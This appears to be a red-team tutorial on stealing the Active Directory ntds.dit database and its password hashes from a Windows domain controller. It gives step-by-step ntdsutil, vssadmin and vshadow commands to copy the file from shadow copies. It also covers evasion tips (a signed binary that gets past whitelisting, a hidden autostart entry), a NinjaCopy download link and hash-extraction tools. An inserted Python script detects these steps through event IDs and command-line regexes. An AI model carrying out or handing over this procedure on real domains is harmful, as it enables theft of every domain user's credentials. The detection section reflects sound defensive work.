Ntds.dit
Ntds.dit is the main Active Directory database. It holds information about domain users, groups and group membership, and it also holds the password hashes of every user in the domain. To further protect those hashes, they are encrypted with a key stored in the SYSTEM registry hive, so the SYSTEM hive is needed alongside the database to decrypt them.
Volume Shadow Copy
The Volume Shadow Copy Service (VSS) is a service framework that Microsoft has provided since Windows XP for creating consistent point-in-time copies (snapshots) of a volume.
- Used for data backup
- Supported on Windows Server 2003 and later
- By default the system creates snapshots automatically under specific conditions, such as after a patch installation. On Windows 7 a snapshot is created automatically about every other week; the exact time cannot be predicted
- Disabling VSS breaks normal system functions such as System Restore and Windows Server Backup
Obtaining the domain controller's ntds.dit file through Volume Shadow Copy
Invoking the Volume Shadow Copy service generates a log entry in the System event log with event ID 7036.
Executing the following ntdsutil snapshot command generates an additional log entry with event ID 98:
ntdsutil snapshot "activate instance ntds" create quit quit
Ntdsutil
Installed by default in a domain environment.
Supported systems:
- Server 2003
- Server 2008
- Server 2012
Procedure
- Query the snapshots of the current system
- Create a snapshot
  ntdsutil snapshot "activate instance ntds" create quit quit
  The GUID of the new snapshot is {78a8e3a8-cc4f-4d40-a303-d7a159c5a2aa}
- Mount the snapshot
  The snapshot is mounted under a path of the form C:\$SNAP_<timestamp>_VOLUMEC$\, here:
  C:\$SNAP_201908291617_VOLUMEC$\
- Copy ntds.dit
  copy C:\$SNAP_201908291617_VOLUMEC$\Windows\NTDS\ntds.dit C:\ntds.dit
- Unmount the snapshot
  ntdsutil snapshot "unmount {78a8e3a8-cc4f-4d40-a303-d7a159c5a2aa}" quit quit quit
- Delete the snapshot
  ntdsutil snapshot "delete {78a8e3a8-cc4f-4d40-a303-d7a159c5a2aa}" quit quit quit
VSSAdmin
Installed by default in a domain environment.
Supported systems:
- Server 2008
- Server 2012
Procedure
- Query the snapshots of the current system
  vssadmin list shadows
- Create a snapshot
  vssadmin create shadow /for=C:
  Note the shadow copy volume name in the output, here:
  \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
- Copy ntds.dit
  copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\ntds.dit C:\ntds.dit
- Delete the snapshot
  vssadmin delete shadows /for=C: /quiet
Vshadow.exe
Not present on the system by default; it ships with the Microsoft Windows Software Development Kit (SDK).
Procedure
- Query the snapshots of the current system
  vshadow.exe -q
- Create a snapshot
  vshadow.exe -p -nw C:
  Note the SnapshotSetID, the SnapshotID and the shadow copy device name in the output.
- Copy ntds.dit
  copy <shadow copy device name>\Windows\NTDS\ntds.dit C:\ntds.dit
- Delete the snapshot
  vshadow -dx={SnapshotSetID}
  or
  vshadow -ds={SnapshotID}
Command execution with vshadow
Reference material:
https://bohops.com/2018/02/10/vshadow-abusing-the-volume-shadow-service-for-evasion-persistence-and-active-directory-database-extraction/
Execute command:
After execution, a vssvc.exe process remains in the background and the Volume Shadow Copy service stays in the running state; the vssvc.exe process has to be terminated manually.
Note:
Terminating the vssvc.exe process manually generates a log entry with event ID 7034.
Usage notes:
Vshadow.exe carries a Microsoft signature, so it can bypass some whitelist restrictions. When it is used as a startup item, it is not shown in the default AutoRuns startup list.
Obtaining the domain controller's ntds.dit file through NinjaCopy
Download address:
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1
NinjaCopy does not call the Volume Shadow Copy service, so no log entry with event ID 7036 is generated.
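As an added defensive example (not part of the original page), the following Python script applies the detection points the page mentions to constructed sample Windows event records: event ID 7036 for the Volume Shadow Copy service entering the running state, event ID 98 reported after the ntdsutil snapshot command, event ID 7034 after vssvc.exe is terminated by hand, and process-creation (event 4688) command lines for ntdsutil, vssadmin, vshadow and copies of ntds.dit out of a snapshot. Because NinjaCopy never starts the VSS service, a 7036-only rule misses it, so the command-line rules also match the Invoke-NinjaCopy script name. The event records, the rule names and the source and message of the event-98 record are constructed for this example; the page gives the ID of that event but not its log source or message text.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    """Minimal view of a Windows event: ID, provider/source and message text."""
    event_id: int
    source: str
    message: str


# Command-line patterns for the tools discussed on the page. Security event 4688
# (process creation) carries the command line when command-line auditing is on.
TOOL_PATTERNS = [
    ("ntdsutil-snapshot", re.compile(r"\bntdsutil\b.*\bsnapshot\b", re.I)),
    ("vssadmin-create-shadow", re.compile(r"\bvssadmin\b.*\bcreate\s+shadow\b", re.I)),
    ("vshadow", re.compile(r"\bvshadow(\.exe)?\b", re.I)),
    ("ninjacopy", re.compile(r"Invoke-NinjaCopy", re.I)),
    # a copy command whose source path ends in \ntds.dit (snapshot mount or shadow device)
    ("ntds-dit-copy", re.compile(r"\bcopy\b.*\\ntds\.dit\b", re.I)),
]

CMDLINE_RE = re.compile(r"Process Command Line:\s*(.+)")


def classify(event):
    """Return the names of all detection rules the event matches ([] if none)."""
    hits = []
    msg = event.message
    if event.event_id == 7036 and "Volume Shadow Copy" in msg and "running" in msg:
        hits.append("vss-service-started")       # VSS invoked (page: event 7036)
    elif event.event_id == 7034 and "Volume Shadow Copy" in msg:
        hits.append("vss-service-terminated")    # vssvc.exe killed by hand (page: event 7034)
    elif event.event_id == 98:
        # The page reports event 98 after "ntdsutil snapshot ... create" without naming
        # its log source, so this rule keys on the ID alone (assumption).
        hits.append("ntds-snapshot-event")
    elif event.event_id == 4688:
        m = CMDLINE_RE.search(msg)
        if m:
            cmdline = m.group(1)
            for name, pattern in TOOL_PATTERNS:
                if pattern.search(cmdline):
                    hits.append(name)
    return hits


def scan(events):
    """Count matching events per rule: {rule_name: count}."""
    counts = {}
    for ev in events:
        for rule in classify(ev):
            counts[rule] = counts.get(rule, 0) + 1
    return counts


# Constructed sample records (not real logs); message texts are abbreviated.
SAMPLE_EVENTS = [
    Event(7036, "Service Control Manager",
          "The Volume Shadow Copy service entered the running state."),
    Event(7036, "Service Control Manager",
          "The Windows Update service entered the running state."),
    Event(98, "Directory Service (placeholder source)",
          "placeholder message for the event the page reports after ntdsutil snapshot create"),
    Event(4688, "Microsoft-Windows-Security-Auditing",
          'A new process has been created. Process Command Line: '
          'ntdsutil snapshot "activate instance ntds" create quit quit'),
    Event(4688, "Microsoft-Windows-Security-Auditing",
          r"A new process has been created. Process Command Line: "
          r"copy C:\$SNAP_201908291617_VOLUMEC$\Windows\NTDS\ntds.dit C:\ntds.dit"),
    Event(4688, "Microsoft-Windows-Security-Auditing",
          "A new process has been created. Process Command Line: "
          "vssadmin create shadow /for=C:"),
    Event(4688, "Microsoft-Windows-Security-Auditing",
          "A new process has been created. Process Command Line: "
          "vshadow.exe -p -nw C:"),
    Event(4688, "Microsoft-Windows-Security-Auditing",
          r"A new process has been created. Process Command Line: "
          r"powershell.exe -File .\Invoke-NinjaCopy.ps1"),
    Event(7034, "Service Control Manager",
          "The Volume Shadow Copy service terminated unexpectedly."),
    Event(4688, "Microsoft-Windows-Security-Auditing",
          r"A new process has been created. Process Command Line: "
          r"notepad.exe C:\notes.txt"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev.event_id, classify(ev) or "benign")
    print(scan(SAMPLE_EVENTS))
```

The two 7036 records show why the rule has to look at the service name in the message rather than at the ID alone: 7036 is logged for every service state change, and only the Volume Shadow Copy entry is of interest here. In a real deployment the same rules would be fed from the System and Security logs (or Sysmon process-creation events) instead of the constructed list.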
QuarksPwDump
Quarks PwDump is an open-source Windows credential extraction tool that can dump various kinds of credentials on the Windows platform, including local accounts, domain accounts, cached domain accounts and BitLocker.
Repair the copied database first.
Then use QuarksPwDump to read the information directly and export the results to a file.
secretsdump.py
The secretsdump.py script from the impacket suite can be used to decrypt the database; it is somewhat slow. It can also be decrypted with mimikatz, but QuarksPwDump feels faster.